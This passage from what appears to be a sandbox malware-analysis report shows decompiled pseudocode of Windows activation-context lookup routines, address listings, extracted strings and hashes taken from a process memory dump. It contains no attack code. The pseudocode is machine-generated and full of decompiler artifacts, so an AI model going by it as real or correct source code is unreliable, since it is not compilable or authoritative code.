                                                                                                                                                                                      																									goto L112;
                                                                                                                                                                                      																								}
                                                                                                                                                                                      																							}
                                                                                                                                                                                      																						}
                                                                                                                                                                                      																						goto L112;
                                                                                                                                                                                      																					}
                                                                                                                                                                                      																					L111:
                                                                                                                                                                                      																					_push(_t173);
                                                                                                                                                                                      																					E1D8CEF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
                                                                                                                                                                                      																					_t129 = 0xc0150003;
                                                                                                                                                                                      																					goto L33;
                                                                                                                                                                                      																				}
                                                                                                                                                                                      																			}
                                                                                                                                                                                      																		}
                                                                                                                                                                                      																	}
                                                                                                                                                                                      																}
                                                                                                                                                                                      															}
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															goto L14;
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      													goto L112;
                                                                                                                                                                                      													L34:
                                                                                                                                                                                      													_t136 = _t135 - 1;
                                                                                                                                                                                      													if(_t136 == 0) {
                                                                                                                                                                                      														goto L14;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														if(_t136 != 1) {
                                                                                                                                                                                      															goto L87;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															goto L36;
                                                                                                                                                                                      														}
                                                                                                                                                                                      													}
                                                                                                                                                                                      													goto L112;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											if(_t130 + 0x2c >  *_t130 + _t130) {
                                                                                                                                                                                      												_push(0xc000000d);
                                                                                                                                                                                      												_push("RtlpFindActivationContextSection_CheckParameters");
                                                                                                                                                                                      												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                                                                                                                                      												L82:
                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                      												_push(0x33);
                                                                                                                                                                                      												E1D8CEF10();
                                                                                                                                                                                      												goto L83;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_t130 = _a20;
                                                                                                                                                                                      												goto L9;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L112:
                                                                                                                                                                                      			}


























































                                                                                                                                                                                      0x1d85a178
                                                                                                                                                                                      0x1d85a17f
                                                                                                                                                                                      0x1d85a182
                                                                                                                                                                                      0x1d85a18f
                                                                                                                                                                                      0x1d85a4b4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a77ce
                                                                                                                                                                                      0x1d8a77ce
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a77ce
                                                                                                                                                                                      0x1d85a195
                                                                                                                                                                                      0x1d85a195
                                                                                                                                                                                      0x1d85a199
                                                                                                                                                                                      0x1d85a1a1
                                                                                                                                                                                      0x1d85a1a9
                                                                                                                                                                                      0x1d85a1b1
                                                                                                                                                                                      0x1d8a77f3
                                                                                                                                                                                      0x1d8a77f3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a1b7
                                                                                                                                                                                      0x1d85a1b7
                                                                                                                                                                                      0x1d85a1c0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a1c6
                                                                                                                                                                                      0x1d85a1c6
                                                                                                                                                                                      0x1d85a1cc
                                                                                                                                                                                      0x1d85a5dc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a5e2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a5e2
                                                                                                                                                                                      0x1d85a1d2
                                                                                                                                                                                      0x1d85a1d4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a1da
                                                                                                                                                                                      0x1d85a1da
                                                                                                                                                                                      0x1d85a1dd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a1e3
                                                                                                                                                                                      0x1d85a1e3
                                                                                                                                                                                      0x1d85a1e6
                                                                                                                                                                                      0x1d85a1fa
                                                                                                                                                                                      0x1d85a1fd
                                                                                                                                                                                      0x1d85a5f0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a5f6
                                                                                                                                                                                      0x1d8a77fd
                                                                                                                                                                                      0x1d8a7802
                                                                                                                                                                                      0x1d8a7807
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a7807
                                                                                                                                                                                      0x1d85a203
                                                                                                                                                                                      0x1d85a203
                                                                                                                                                                                      0x1d85a208
                                                                                                                                                                                      0x1d85a20b
                                                                                                                                                                                      0x1d85a20f
                                                                                                                                                                                      0x1d85a216
                                                                                                                                                                                      0x1d85a21c
                                                                                                                                                                                      0x1d85a224
                                                                                                                                                                                      0x1d85a228
                                                                                                                                                                                      0x1d85a22b
                                                                                                                                                                                      0x1d85a233
                                                                                                                                                                                      0x1d85a23b
                                                                                                                                                                                      0x1d85a23f
                                                                                                                                                                                      0x1d85a243
                                                                                                                                                                                      0x1d85a247
                                                                                                                                                                                      0x1d85a250
                                                                                                                                                                                      0x1d85a252
                                                                                                                                                                                      0x1d85a255
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a25b
                                                                                                                                                                                      0x1d85a263
                                                                                                                                                                                      0x1d85a26f
                                                                                                                                                                                      0x1d85a26f
                                                                                                                                                                                      0x1d85a277
                                                                                                                                                                                      0x1d85a27d
                                                                                                                                                                                      0x1d85a3ae
                                                                                                                                                                                      0x1d85a3ae
                                                                                                                                                                                      0x1d85a3b4
                                                                                                                                                                                      0x1d85a3be
                                                                                                                                                                                      0x1d8a7823
                                                                                                                                                                                      0x1d8a7826
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a782c
                                                                                                                                                                                      0x1d8a782c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a782c
                                                                                                                                                                                      0x1d85a3c4
                                                                                                                                                                                      0x1d85a3c4
                                                                                                                                                                                      0x1d85a3c9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a3c9
                                                                                                                                                                                      0x1d85a283
                                                                                                                                                                                      0x1d85a283
                                                                                                                                                                                      0x1d85a288
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a288
                                                                                                                                                                                      0x1d85a265
                                                                                                                                                                                      0x1d85a265
                                                                                                                                                                                      0x1d85a269
                                                                                                                                                                                      0x1d85a4bf
                                                                                                                                                                                      0x1d85a4c2
                                                                                                                                                                                      0x1d85a4c8
                                                                                                                                                                                      0x1d85a4e3
                                                                                                                                                                                      0x1d8a780e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a4e9
                                                                                                                                                                                      0x1d85a4ec
                                                                                                                                                                                      0x1d8a7819
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a4f2
                                                                                                                                                                                      0x1d85a4f2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a4f2
                                                                                                                                                                                      0x1d85a4ec
                                                                                                                                                                                      0x1d85a4ca
                                                                                                                                                                                      0x1d85a4ca
                                                                                                                                                                                      0x1d85a4cc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a4d2
                                                                                                                                                                                      0x1d85a4d2
                                                                                                                                                                                      0x1d85a4d2
                                                                                                                                                                                      0x1d85a4d7
                                                                                                                                                                                      0x1d85a28c
                                                                                                                                                                                      0x1d85a28e
                                                                                                                                                                                      0x1d8a7833
                                                                                                                                                                                      0x1d8a7838
                                                                                                                                                                                      0x1d8a7838
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a294
                                                                                                                                                                                      0x1d85a2a5
                                                                                                                                                                                      0x1d85a2ac
                                                                                                                                                                                      0x1d85a3d2
                                                                                                                                                                                      0x1d85a3d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a3e8
                                                                                                                                                                                      0x1d85a3e8
                                                                                                                                                                                      0x1d85a3ec
                                                                                                                                                                                      0x1d85a3f0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a3f0
                                                                                                                                                                                      0x1d85a2b2
                                                                                                                                                                                      0x1d85a2b2
                                                                                                                                                                                      0x1d85a2d2
                                                                                                                                                                                      0x1d85a2d6
                                                                                                                                                                                      0x1d85a2d8
                                                                                                                                                                                      0x1d85a2da
                                                                                                                                                                                      0x1d85a2dc
                                                                                                                                                                                      0x1d85a2de
                                                                                                                                                                                      0x1d8a783a
                                                                                                                                                                                      0x1d8a783c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a7842
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a7842
                                                                                                                                                                                      0x1d85a2e4
                                                                                                                                                                                      0x1d85a2e4
                                                                                                                                                                                      0x1d85a2e4
                                                                                                                                                                                      0x1d85a2eb
                                                                                                                                                                                      0x1d8a78ed
                                                                                                                                                                                      0x1d8a78ed
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a2f1
                                                                                                                                                                                      0x1d85a2f1
                                                                                                                                                                                      0x1d85a300
                                                                                                                                                                                      0x1d85a300
                                                                                                                                                                                      0x1d85a300
                                                                                                                                                                                      0x1d85a30a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a310
                                                                                                                                                                                      0x1d85a325
                                                                                                                                                                                      0x1d85a32c
                                                                                                                                                                                      0x1d85a4f7
                                                                                                                                                                                      0x1d85a500
                                                                                                                                                                                      0x1d85a502
                                                                                                                                                                                      0x1d85a505
                                                                                                                                                                                      0x1d85a50b
                                                                                                                                                                                      0x1d85a5a5
                                                                                                                                                                                      0x1d85a5b8
                                                                                                                                                                                      0x1d85a5be
                                                                                                                                                                                      0x1d85a5c2
                                                                                                                                                                                      0x1d85a5cb
                                                                                                                                                                                      0x1d85a5d1
                                                                                                                                                                                      0x1d85a5d1
                                                                                                                                                                                      0x1d85a5cb
                                                                                                                                                                                      0x1d85a50b
                                                                                                                                                                                      0x1d85a523
                                                                                                                                                                                      0x1d85a549
                                                                                                                                                                                      0x1d85a551
                                                                                                                                                                                      0x1d85a525
                                                                                                                                                                                      0x1d85a53c
                                                                                                                                                                                      0x1d85a543
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a543
                                                                                                                                                                                      0x1d85a332
                                                                                                                                                                                      0x1d85a337
                                                                                                                                                                                      0x1d85a393
                                                                                                                                                                                      0x1d85a399
                                                                                                                                                                                      0x1d85a339
                                                                                                                                                                                      0x1d85a339
                                                                                                                                                                                      0x1d85a342
                                                                                                                                                                                      0x1d85a344
                                                                                                                                                                                      0x1d85a34a
                                                                                                                                                                                      0x1d85a34e
                                                                                                                                                                                      0x1d85a355
                                                                                                                                                                                      0x1d85a359
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a360
                                                                                                                                                                                      0x1d85a363
                                                                                                                                                                                      0x1d85a3fa
                                                                                                                                                                                      0x1d85a3fc
                                                                                                                                                                                      0x1d8a7847
                                                                                                                                                                                      0x1d8a784f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a7855
                                                                                                                                                                                      0x1d8a7855
                                                                                                                                                                                      0x1d8a7859
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a785f
                                                                                                                                                                                      0x1d8a785f
                                                                                                                                                                                      0x1d8a7862
                                                                                                                                                                                      0x1d8a7868
                                                                                                                                                                                      0x1d8a7892
                                                                                                                                                                                      0x1d8a7894
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a786a
                                                                                                                                                                                      0x1d8a786d
                                                                                                                                                                                      0x1d8a787e
                                                                                                                                                                                      0x1d8a788b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a7880
                                                                                                                                                                                      0x1d8a7880
                                                                                                                                                                                      0x1d8a7885
                                                                                                                                                                                      0x1d8a789a
                                                                                                                                                                                      0x1d8a789a
                                                                                                                                                                                      0x1d8a789f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a789f
                                                                                                                                                                                      0x1d8a786f
                                                                                                                                                                                      0x1d8a7873
                                                                                                                                                                                      0x1d8a788e
                                                                                                                                                                                      0x1d8a788e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a788e
                                                                                                                                                                                      0x1d8a786d
                                                                                                                                                                                      0x1d8a7868
                                                                                                                                                                                      0x1d8a7859
                                                                                                                                                                                      0x1d85a402
                                                                                                                                                                                      0x1d85a402
                                                                                                                                                                                      0x1d85a405
                                                                                                                                                                                      0x1d85a554
                                                                                                                                                                                      0x1d85a556
                                                                                                                                                                                      0x1d85a55e
                                                                                                                                                                                      0x1d85a564
                                                                                                                                                                                      0x1d85a56a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a570
                                                                                                                                                                                      0x1d85a570
                                                                                                                                                                                      0x1d85a575
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a575
                                                                                                                                                                                      0x1d85a40b
                                                                                                                                                                                      0x1d85a40e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a414
                                                                                                                                                                                      0x1d85a414
                                                                                                                                                                                      0x1d85a418
                                                                                                                                                                                      0x1d85a420
                                                                                                                                                                                      0x1d85a426
                                                                                                                                                                                      0x1d85a42c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a432
                                                                                                                                                                                      0x1d85a432
                                                                                                                                                                                      0x1d85a437
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a437
                                                                                                                                                                                      0x1d85a42c
                                                                                                                                                                                      0x1d85a40e
                                                                                                                                                                                      0x1d85a405
                                                                                                                                                                                      0x1d85a369
                                                                                                                                                                                      0x1d85a369
                                                                                                                                                                                      0x1d85a36c
                                                                                                                                                                                      0x1d8a78e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a372
                                                                                                                                                                                      0x1d85a372
                                                                                                                                                                                      0x1d85a374
                                                                                                                                                                                      0x1d85a452
                                                                                                                                                                                      0x1d85a459
                                                                                                                                                                                      0x1d85a57e
                                                                                                                                                                                      0x1d85a585
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a594
                                                                                                                                                                                      0x1d85a594
                                                                                                                                                                                      0x1d85a598
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a598
                                                                                                                                                                                      0x1d85a45f
                                                                                                                                                                                      0x1d85a45f
                                                                                                                                                                                      0x1d85a47f
                                                                                                                                                                                      0x1d85a483
                                                                                                                                                                                      0x1d85a485
                                                                                                                                                                                      0x1d85a487
                                                                                                                                                                                      0x1d85a489
                                                                                                                                                                                      0x1d85a48b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a491
                                                                                                                                                                                      0x1d85a493
                                                                                                                                                                                      0x1d8a78a8
                                                                                                                                                                                      0x1d8a78b1
                                                                                                                                                                                      0x1d8a78c3
                                                                                                                                                                                      0x1d8a78c3
                                                                                                                                                                                      0x1d8a78cb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a78d6
                                                                                                                                                                                      0x1d8a78dc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a78de
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a78de
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a78dc
                                                                                                                                                                                      0x1d8a78c3
                                                                                                                                                                                      0x1d8a78b1
                                                                                                                                                                                      0x1d85a499
                                                                                                                                                                                      0x1d85a499
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a499
                                                                                                                                                                                      0x1d85a48b
                                                                                                                                                                                      0x1d85a37a
                                                                                                                                                                                      0x1d85a37a
                                                                                                                                                                                      0x1d85a37f
                                                                                                                                                                                      0x1d85a381
                                                                                                                                                                                      0x1d85a49b
                                                                                                                                                                                      0x1d85a49b
                                                                                                                                                                                      0x1d85a4a2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a4a8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a4a8
                                                                                                                                                                                      0x1d85a387
                                                                                                                                                                                      0x1d85a387
                                                                                                                                                                                      0x1d85a38c
                                                                                                                                                                                      0x1d85a38e
                                                                                                                                                                                      0x1d85a38e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a38c
                                                                                                                                                                                      0x1d85a381
                                                                                                                                                                                      0x1d85a374
                                                                                                                                                                                      0x1d85a36c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a363
                                                                                                                                                                                      0x1d85a360
                                                                                                                                                                                      0x1d85a337
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a32c
                                                                                                                                                                                      0x1d8a78f1
                                                                                                                                                                                      0x1d8a78f1
                                                                                                                                                                                      0x1d8a78fc
                                                                                                                                                                                      0x1d8a7904
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a7904
                                                                                                                                                                                      0x1d85a2eb
                                                                                                                                                                                      0x1d85a2de
                                                                                                                                                                                      0x1d85a2ac
                                                                                                                                                                                      0x1d85a28e
                                                                                                                                                                                      0x1d85a4cc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a269
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a39c
                                                                                                                                                                                      0x1d85a39c
                                                                                                                                                                                      0x1d85a39f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a3a5
                                                                                                                                                                                      0x1d85a3a8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a3a8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a39f
                                                                                                                                                                                      0x1d85a250
                                                                                                                                                                                      0x1d85a1e8
                                                                                                                                                                                      0x1d85a1f1
                                                                                                                                                                                      0x1d8a77d8
                                                                                                                                                                                      0x1d8a77dd
                                                                                                                                                                                      0x1d8a77e2
                                                                                                                                                                                      0x1d8a77e7
                                                                                                                                                                                      0x1d8a77e7
                                                                                                                                                                                      0x1d8a77e9
                                                                                                                                                                                      0x1d8a77eb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a1f7
                                                                                                                                                                                      0x1d85a1f7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d85a1f7
                                                                                                                                                                                      0x1d85a1f1
                                                                                                                                                                                      0x1d85a1e6
                                                                                                                                                                                      0x1d85a1dd
                                                                                                                                                                                      0x1d85a1d4
                                                                                                                                                                                      0x1d85a1cc
                                                                                                                                                                                      0x1d85a1c0
                                                                                                                                                                                      0x1d85a1b1
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Actx , xrefs: 1D8A7819, 1D8A7880
                                                                                                                                                                                      • SsHd, xrefs: 1D85A304
                                                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D8A7807
                                                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D8A77E2
                                                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D8A77DD, 1D8A7802
                                                                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1D8A78F3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                                                                      • Opcode ID: e98e409bc31b6a714212c93451c9b5d531433f5fef759d2147db5c0fe00c9b42
                                                                                                                                                                                      • Instruction ID: d28282f3e387253d471acf4f0e71d5b3233787d09ab8100cd64f5d852bbf8669
                                                                                                                                                                                      • Opcode Fuzzy Hash: e98e409bc31b6a714212c93451c9b5d531433f5fef759d2147db5c0fe00c9b42
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CE1BE70A083468FD705CF68C8D0B6BB7E5BB84618F114A2DF9A69B290D731E845CB93
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 54%
                                                                                                                                                                                      			E1D85D690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				char _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                      				char _v56;
                                                                                                                                                                                      				char _v60;
                                                                                                                                                                                      				signed int _v64;
                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                      				signed int _v72;
                                                                                                                                                                                      				char _v76;
                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                      				signed int* _v84;
                                                                                                                                                                                      				char _v88;
                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                      				char _v93;
                                                                                                                                                                                      				signed int _v104;
                                                                                                                                                                                      				char _v117;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				intOrPtr _t150;
                                                                                                                                                                                      				char _t158;
                                                                                                                                                                                      				intOrPtr _t160;
                                                                                                                                                                                      				intOrPtr _t163;
                                                                                                                                                                                      				intOrPtr* _t164;
                                                                                                                                                                                      				intOrPtr _t170;
                                                                                                                                                                                      				signed int _t171;
                                                                                                                                                                                      				void* _t172;
                                                                                                                                                                                      				signed int _t195;
                                                                                                                                                                                      				intOrPtr* _t201;
                                                                                                                                                                                      				signed int _t205;
                                                                                                                                                                                      				intOrPtr* _t209;
                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                      				intOrPtr _t211;
                                                                                                                                                                                      				intOrPtr _t213;
                                                                                                                                                                                      				signed int _t214;
                                                                                                                                                                                      				intOrPtr* _t215;
                                                                                                                                                                                      				intOrPtr _t217;
                                                                                                                                                                                      				intOrPtr _t225;
                                                                                                                                                                                      				intOrPtr _t227;
                                                                                                                                                                                      				intOrPtr _t228;
                                                                                                                                                                                      				void* _t233;
                                                                                                                                                                                      				intOrPtr* _t234;
                                                                                                                                                                                      				signed int _t242;
                                                                                                                                                                                      				void* _t246;
                                                                                                                                                                                      				signed int _t247;
                                                                                                                                                                                      				signed int _t252;
                                                                                                                                                                                      				void* _t253;
                                                                                                                                                                                      				intOrPtr* _t254;
                                                                                                                                                                                      				intOrPtr _t255;
                                                                                                                                                                                      				signed int _t256;
                                                                                                                                                                                      				signed int _t258;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t258 = (_t256 & 0xfffffff8) - 0x5c;
                                                                                                                                                                                      				_v8 =  *0x1d93b370 ^ _t258;
                                                                                                                                                                                      				_t217 =  *[fs:0x18];
                                                                                                                                                                                      				_t241 = _a16;
                                                                                                                                                                                      				_t209 = _a20;
                                                                                                                                                                                      				_t150 =  *((intOrPtr*)(_t217 + 0x30));
                                                                                                                                                                                      				_t252 = _a8;
                                                                                                                                                                                      				_v84 = _t241;
                                                                                                                                                                                      				_v80 = _t209;
                                                                                                                                                                                      				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
                                                                                                                                                                                      					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t151 = 0xc0150001;
                                                                                                                                                                                      						L24:
                                                                                                                                                                                      						_pop(_t246);
                                                                                                                                                                                      						_pop(_t253);
                                                                                                                                                                                      						_pop(_t210);
                                                                                                                                                                                      						return E1D884B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L1:
                                                                                                                                                                                      				_v88 = 0;
                                                                                                                                                                                      				if(_t241 == 0) {
                                                                                                                                                                                      					L49:
                                                                                                                                                                                      					_t151 = 0xc000000d;
                                                                                                                                                                                      					goto L24;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t241 = _a4;
                                                                                                                                                                                      				if((_t241 & 0xfffffff8) != 0) {
                                                                                                                                                                                      					goto L49;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if((_t241 & 0x00000007) == 0) {
                                                                                                                                                                                      					if(_t209 != 0) {
                                                                                                                                                                                      						L5:
                                                                                                                                                                                      						if( *_t209 < 0x24) {
                                                                                                                                                                                      							goto L49;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L6:
                                                                                                                                                                                      						if((_t241 & 0x00000002) != 0) {
                                                                                                                                                                                      							if(_t209 + 0x2c <=  *_t209 + _t209) {
                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_push(0xc000000d);
                                                                                                                                                                                      							_push("RtlpFindActivationContextSection_CheckParameters");
                                                                                                                                                                                      							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                                                                                                                                      							L48:
                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                      							_push(0x33);
                                                                                                                                                                                      							E1D8CEF10();
                                                                                                                                                                                      							_t258 = _t258 + 0x14;
                                                                                                                                                                                      							goto L49;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L7:
                                                                                                                                                                                      						if((_t241 & 0x00000004) != 0) {
                                                                                                                                                                                      							if(_t209 + 0x40 <=  *_t209 + _t209) {
                                                                                                                                                                                      								goto L8;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_push(0xc000000d);
                                                                                                                                                                                      							_push("RtlpFindActivationContextSection_CheckParameters");
                                                                                                                                                                                      							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                                                                                                                                      							goto L48;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L8:
                                                                                                                                                                                      						_t241 =  &_v76;
                                                                                                                                                                                      						_v48 = _a12;
                                                                                                                                                                                      						_v60 = 0x18;
                                                                                                                                                                                      						_v56 = 0;
                                                                                                                                                                                      						_v52 = _t252;
                                                                                                                                                                                      						_v40 = 0;
                                                                                                                                                                                      						_v64 = 0;
                                                                                                                                                                                      						_v44 = 0;
                                                                                                                                                                                      						if(E1D85D580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t151 = 0;
                                                                                                                                                                                      						if(0 < 0) {
                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t158 = _v88;
                                                                                                                                                                                      						if(_t158 < 0x28) {
                                                                                                                                                                                      							L34:
                                                                                                                                                                                      							_t254 = _v76;
                                                                                                                                                                                      							L91:
                                                                                                                                                                                      							_push(_t158);
                                                                                                                                                                                      							E1D8CEF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
                                                                                                                                                                                      							_t258 = _t258 + 0x14;
                                                                                                                                                                                      							_t151 = 0xc0150003;
                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t247 = _v64;
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							L12:
                                                                                                                                                                                      							_t254 = _v76;
                                                                                                                                                                                      							if( *_t254 != 0x64487347) {
                                                                                                                                                                                      								goto L91;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t211 =  *((intOrPtr*)(_t254 + 0x14));
                                                                                                                                                                                      							_t160 = 1;
                                                                                                                                                                                      							if(_t211 == 0) {
                                                                                                                                                                                      								L19:
                                                                                                                                                                                      								_t225 =  *[fs:0x18];
                                                                                                                                                                                      								_t255 = _v44;
                                                                                                                                                                                      								_v92 = 0;
                                                                                                                                                                                      								_t247 = 0;
                                                                                                                                                                                      								_v68 = _t225;
